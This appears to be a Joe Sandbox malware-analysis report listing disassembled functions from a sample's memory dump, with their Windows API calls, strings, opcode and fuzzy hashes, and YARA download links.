Opcode ID: c7e3481f970ce1cb3c2f3cd78d6a184081dd6cc28e9edebc6d53b2da4028288f
Instruction ID: ec2bb82bf6c5b1b030ca4100b1dd1a7ca9c789f86a2448293d3826cd393e2bd7
Opcode Fuzzy Hash: c7e3481f970ce1cb3c2f3cd78d6a184081dd6cc28e9edebc6d53b2da4028288f
Instruction Fuzzy Hash: 5C61BD31108341AFC304EF64DC89DAFBBE8EF99350F50091DF595931A1DB309A99CB92

Function 001E326F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(002B1990), ref: 00222F8D
GetMenuItemCount.USER32(002B1990), ref: 0022303D
GetCursorPos.USER32(?), ref: 00223081
SetForegroundWindow.USER32(00000000), ref: 0022308A
TrackPopupMenuEx.USER32(002B1990,00000000,?,00000000,00000000,00000000), ref: 0022309D
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 002230A9

Strings

0, xrefs: 001E327D

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
String ID: 0
API String ID: 36266755-4108050209
Opcode ID: 0deb3ed03f48a127a02166a318b2934b6f4b0ebdafe061623526c6ea5cd7f6ab
Instruction ID: ff32f6ea00246b90da6f4cc3c04a0ffa3804f3ebdc822149339f0f6f0a9d535b
Opcode Fuzzy Hash: 0deb3ed03f48a127a02166a318b2934b6f4b0ebdafe061623526c6ea5cd7f6ab
Instruction Fuzzy Hash: 91712B70640216BEEB258F65ED8DF9ABF64FF00324F204206F6256A1E0C7B2A964DB50

Function 00276CD9 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,?), ref: 00276DEB

Part of subcall function 001E6B57: _wcslen.LIBCMT ref: 001E6B6A

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00276E5F
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00276E81
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00276E94
DestroyWindow.USER32(?), ref: 00276EB5
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,001E0000,00000000), ref: 00276EE4
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00276EFD
GetDesktopWindow.USER32 ref: 00276F16
GetWindowRect.USER32(00000000), ref: 00276F1D
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00276F35
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00276F4D

Part of subcall function 001F9944: GetWindowLongW.USER32(?,000000EB), ref: 001F9952

Strings

0, xrefs: 00276D98
tooltips_class32, xrefs: 00276E58, 00276EDD

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
String ID: 0$tooltips_class32
API String ID: 2429346358-3619404913
Opcode ID: 7be90ecfdb6480fbb168933920495cb76741568a4823b7748184dffd27908085
Instruction ID: 3c3f338d0bc756101d7e33d394e2a30dfd9a6ff62ed6c2abca778ad881265ecd
Opcode Fuzzy Hash: 7be90ecfdb6480fbb168933920495cb76741568a4823b7748184dffd27908085
Instruction Fuzzy Hash: BC71A870100641AFDB25DF28EC48FBABBF9FB89300F64451DF98987261C770A969CB12

Function 0025C476 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0025C4B0
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0025C4C3
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0025C4D7
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0025C4F0
InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0025C533
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0025C549
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0025C554
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0025C584
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0025C5DC
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0025C5F0
InternetCloseHandle.WININET(00000000), ref: 0025C5FB

Strings

, xrefs: 0025C575

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
String ID:
API String ID: 3800310941-3916222277
Opcode ID: e81d4e3d4aebcdf19482eaeb44dae860bf0a1338e8199b0c391dda01b36cf296
Instruction ID: 3603bd61703d669716648812a8930b5011639e088b65e62982de690783088a62
Opcode Fuzzy Hash: e81d4e3d4aebcdf19482eaeb44dae860bf0a1338e8199b0c391dda01b36cf296
Instruction Fuzzy Hash: F2516EB0510305BFDB218FA4DD88ABB7BBCFF08755F60441EF945A6210EB34EA589B64

Function 0027856F Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 00278592
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 002785A2
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 002785AD
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 002785BA
GlobalLock.KERNEL32(00000000), ref: 002785C8
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 002785D7
GlobalUnlock.KERNEL32(00000000), ref: 002785E0
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 002785E7
CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 002785F8
OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,0027FC38,?), ref: 00278611
GlobalFree.KERNEL32(00000000), ref: 00278621
GetObjectW.GDI32(?,00000018,?), ref: 00278641
CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00278671
DeleteObject.GDI32(?), ref: 00278699
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 002786AF

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: 971592ec18f40949a88b5af364619d6e5d2c3aa20870408d83a2548518aacb94
Instruction ID: 616b079b455399257a5020085e9e1d4aa51cd6c4859fb88948bc3863609aac86
Opcode Fuzzy Hash: 971592ec18f40949a88b5af364619d6e5d2c3aa20870408d83a2548518aacb94
Instruction Fuzzy Hash: F141F875641209BFDB119FA5DC8CEAA7BBCFF89B11F248058F909E7260DB709941CB60

Function 002514BD Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 360timeCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 00251502
VariantCopy.OLEAUT32(?,?), ref: 0025150B
VariantClear.OLEAUT32(?), ref: 00251517
VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 002515FB
VarR8FromDec.OLEAUT32(?,?), ref: 00251657
VariantInit.OLEAUT32(?), ref: 00251708
SysFreeString.OLEAUT32(?), ref: 0025178C
VariantClear.OLEAUT32(?), ref: 002517D8
VariantClear.OLEAUT32(?), ref: 002517E7
VariantInit.OLEAUT32(00000000), ref: 00251823

Strings

Default, xrefs: 002516AF
%4d%02d%02d%02d%02d%02d, xrefs: 00251625

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 1234038744-3931177956
Opcode ID: 33c02f05f7480b74315803662a4233678b6df566fa7fb987c878b27852e2a527
Instruction ID: 44486e7ebcf6e0bc72e4b564c008aaef66955fbe509c15392d5ec42aaa17300b
Opcode Fuzzy Hash: 33c02f05f7480b74315803662a4233678b6df566fa7fb987c878b27852e2a527
Instruction Fuzzy Hash: 5BD15671A20105DBCB10AF65E888B7DB7B4BF44701F60805AFC06AB190EBB4DC79DB65

Function 0026B60E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 001E9CB3: _wcslen.LIBCMT ref: 001E9CBD

Part of subcall function 0026C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0026B6AE,?,?), ref: 0026C9B5
Part of subcall function 0026C998: _wcslen.LIBCMT ref: 0026C9F1
Part of subcall function 0026C998: _wcslen.LIBCMT ref: 0026CA68
Part of subcall function 0026C998: _wcslen.LIBCMT ref: 0026CA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0026B6F4
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0026B772
RegDeleteValueW.ADVAPI32(?,?), ref: 0026B80A
RegCloseKey.ADVAPI32(?), ref: 0026B87E
RegCloseKey.ADVAPI32(?), ref: 0026B89C
LoadLibraryA.KERNEL32(advapi32.dll), ref: 0026B8F2
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0026B904
RegDeleteKeyW.ADVAPI32(?,?), ref: 0026B922
FreeLibrary.KERNEL32(00000000), ref: 0026B983
RegCloseKey.ADVAPI32(00000000), ref: 0026B994

Strings

advapi32.dll, xrefs: 0026B8ED
RegDeleteKeyExW, xrefs: 0026B8FE

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 146587525-4033151799
Opcode ID: b9222bbde5116ca99211616be2efa55d267bb643dfb8195c6ab930238f652ff5
Instruction ID: 7bf0e749544ac5d4705613ff1b2946b99e11331975cf9fb5dd77e4dbb8bfd988
Opcode Fuzzy Hash: b9222bbde5116ca99211616be2efa55d267bb643dfb8195c6ab930238f652ff5
Instruction Fuzzy Hash: 27C19C31218642AFD715DF25C494F2ABBE5BF84308F54845CF49A8B2A2CB71EC96CB91

Function 0026255C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 002625D8
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 002625E8
CreateCompatibleDC.GDI32(?), ref: 002625F4
SelectObject.GDI32(00000000,?), ref: 00262601
StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 0026266D
GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 002626AC
GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 002626D0
SelectObject.GDI32(?,?), ref: 002626D8
DeleteObject.GDI32(?), ref: 002626E1
DeleteDC.GDI32(?), ref: 002626E8
ReleaseDC.USER32(00000000,?), ref: 002626F3

Strings

(, xrefs: 0026268D

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: 893e89317b73c4d2a95b7bedbe3864be79585691bc71785821e0e6cddb987457
Instruction ID: e4e3086dea31a41ed9c9d379af2dd12f247df8e752d5954213334679a726ce1a
Opcode Fuzzy Hash: 893e89317b73c4d2a95b7bedbe3864be79585691bc71785821e0e6cddb987457
Instruction Fuzzy Hash: 8D61F375D10219EFCF14CFA4D888EAEBBB9FF48310F208529E959A7250D770A991CF90

Function 0021DA5D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0021DAA1

Part of subcall function 0021D63C: _free.LIBCMT ref: 0021D659
Part of subcall function 0021D63C: _free.LIBCMT ref: 0021D66B
Part of subcall function 0021D63C: _free.LIBCMT ref: 0021D67D
Part of subcall function 0021D63C: _free.LIBCMT ref: 0021D68F
Part of subcall function 0021D63C: _free.LIBCMT ref: 0021D6A1
Part of subcall function 0021D63C: _free.LIBCMT ref: 0021D6B3
Part of subcall function 0021D63C: _free.LIBCMT ref: 0021D6C5
Part of subcall function 0021D63C: _free.LIBCMT ref: 0021D6D7
Part of subcall function 0021D63C: _free.LIBCMT ref: 0021D6E9
Part of subcall function 0021D63C: _free.LIBCMT ref: 0021D6FB
Part of subcall function 0021D63C: _free.LIBCMT ref: 0021D70D
Part of subcall function 0021D63C: _free.LIBCMT ref: 0021D71F
Part of subcall function 0021D63C: _free.LIBCMT ref: 0021D731

_free.LIBCMT ref: 0021DA96

Part of subcall function 002129C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0021D7D1,?,00000000,?,00000000,?,0021D7F8,?,00000007,?,?,0021DBF5,?), ref: 002129DE
Part of subcall function 002129C8: GetLastError.KERNEL32(?,?,0021D7D1,?,00000000,?,00000000,?,0021D7F8,?,00000007,?,?,0021DBF5,?,?), ref: 002129F0

_free.LIBCMT ref: 0021DAB8
_free.LIBCMT ref: 0021DACD
_free.LIBCMT ref: 0021DAD8
_free.LIBCMT ref: 0021DAFA
_free.LIBCMT ref: 0021DB0D
_free.LIBCMT ref: 0021DB1B
_free.LIBCMT ref: 0021DB26
_free.LIBCMT ref: 0021DB5E
_free.LIBCMT ref: 0021DB65
_free.LIBCMT ref: 0021DB82
_free.LIBCMT ref: 0021DB9A

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: b2006d628fedb886ca22f8d57afdb7a8e7d7b170fe08cfc6f84278f32f227f55
Instruction ID: e2da868e72707bcc4a2f2740365d3fb5dbd32792a5ca4da653758a0858295697
Opcode Fuzzy Hash: b2006d628fedb886ca22f8d57afdb7a8e7d7b170fe08cfc6f84278f32f227f55
Instruction Fuzzy Hash: 7C316D3262460ADFDB21AE38E841BD677E8FF20320F204429F049DB191DE31ADF48B20

Function 0024365B Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 267windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 0024369C
_wcslen.LIBCMT ref: 002436A7
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00243797
GetClassNameW.USER32(?,?,00000400), ref: 0024380C
GetDlgCtrlID.USER32(?), ref: 0024385D
GetWindowRect.USER32(?,?), ref: 00243882
GetParent.USER32(?), ref: 002438A0
ScreenToClient.USER32(00000000), ref: 002438A7
GetClassNameW.USER32(?,?,00000100), ref: 00243921
GetWindowTextW.USER32(?,?,00000400), ref: 0024395D

Strings

%s%u, xrefs: 00243734

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
String ID: %s%u
API String ID: 4010501982-679674701
Opcode ID: 053eb84edf21bee58a337f65d20706484f4bb046048046f336ffe994cdeb0397
Instruction ID: 8df29cd195519971a16bcf3fc1ddcc06de49954039aa2b7645a2ae8365b55829
Opcode Fuzzy Hash: 053eb84edf21bee58a337f65d20706484f4bb046048046f336ffe994cdeb0397
Instruction Fuzzy Hash: DA91AE71224707AFD71DDF24C885BAAF7A8FF44350F108629F99AC2190DB30EA65CB91

Function 00244954 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 253COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000400), ref: 00244994
GetWindowTextW.USER32(?,?,00000400), ref: 002449DA
_wcslen.LIBCMT ref: 002449EB
CharUpperBuffW.USER32(?,00000000), ref: 002449F7
_wcsstr.LIBVCRUNTIME ref: 00244A2C
GetClassNameW.USER32(00000018,?,00000400), ref: 00244A64
GetWindowTextW.USER32(?,?,00000400), ref: 00244A9D
GetClassNameW.USER32(00000018,?,00000400), ref: 00244AE6
GetClassNameW.USER32(?,?,00000400), ref: 00244B20
GetWindowRect.USER32(?,?), ref: 00244B8B

Strings

ThumbnailClass, xrefs: 00244A6F, 00244AF1

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
String ID: ThumbnailClass
API String ID: 1311036022-1241985126
Opcode ID: a23469a25cc01adc123fc5c8f2816547bcff7b8d2ba922286b39208bdc0feb93
Instruction ID: 0a7a9676884e44cb655b9afdb5ca3a17314eda45bc3354b11463501f3c743d1c
Opcode Fuzzy Hash: a23469a25cc01adc123fc5c8f2816547bcff7b8d2ba922286b39208bdc0feb93
Instruction Fuzzy Hash: 3B91C0714242069FDB08EF14C985FAA77E8FF84718F04846AFD859A096DB30ED65CFA1

Function 00278D0E Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 221windowCOMMON

Download Yara Rule

APIs

Part of subcall function 001F9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 001F9BB2

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00278D5A
GetFocus.USER32 ref: 00278D6A
GetDlgCtrlID.USER32(00000000), ref: 00278D75
DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 00278E1D
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00278ECF
GetMenuItemCount.USER32(?), ref: 00278EEC
GetMenuItemID.USER32(?,00000000), ref: 00278EFC
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00278F2E
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00278F70
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00278FA1

Strings

0, xrefs: 00278E9F

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
String ID: 0
API String ID: 1026556194-4108050209
Opcode ID: e9761d8ab3025ea5ebd871fd12bfbe978e261a6aef019d5615685979744c1f86
Instruction ID: a8707dbcec61d9037951120cab329c835f4241606fe174e8900684cf7eff3dd0
Opcode Fuzzy Hash: e9761d8ab3025ea5ebd871fd12bfbe978e261a6aef019d5615685979744c1f86
Instruction Fuzzy Hash: E881BF715583029FD720CF24D888AAB7BE9FF88354F14891DF98C97291DB71D960CBA2

Function 0024DC0E Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 178COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 0024DC20
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 0024DC46
_wcslen.LIBCMT ref: 0024DC50
_wcsstr.LIBVCRUNTIME ref: 0024DCA0
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 0024DCBC

Strings

04090000, xrefs: 0024DCF2
StringFileInfo\, xrefs: 0024DC8F
\VarFileInfo\Translation, xrefs: 0024DCB4
%u.%u.%u.%u, xrefs: 0024DD9A
DefaultLangCodepage, xrefs: 0024DD1F

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 1939486746-1459072770
Opcode ID: 0e79dad09ebbc3fb62025ed9da1ce3254d987729a53396267e240f16174766ce
Instruction ID: ad6e795160661c6cfe6674fbb057fa4332f4cd0626a71c2ad297a29f3d26e1f4
Opcode Fuzzy Hash: 0e79dad09ebbc3fb62025ed9da1ce3254d987729a53396267e240f16174766ce
Instruction Fuzzy Hash: 18411672960305BADB08AB74DC47EBF77ACEF52710F14406AF905A61C3EB7499218BA4

Function 0026CC34 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0026CC64
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 0026CC8D
FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0026CD48

Part of subcall function 0026CC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0026CCAA
Part of subcall function 0026CC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 0026CCBD
Part of subcall function 0026CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0026CCCF
Part of subcall function 0026CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0026CD05
Part of subcall function 0026CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0026CD28

RegDeleteKeyW.ADVAPI32(?,?), ref: 0026CCF3

Strings

advapi32.dll, xrefs: 0026CCB8
RegDeleteKeyExW, xrefs: 0026CCC9

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
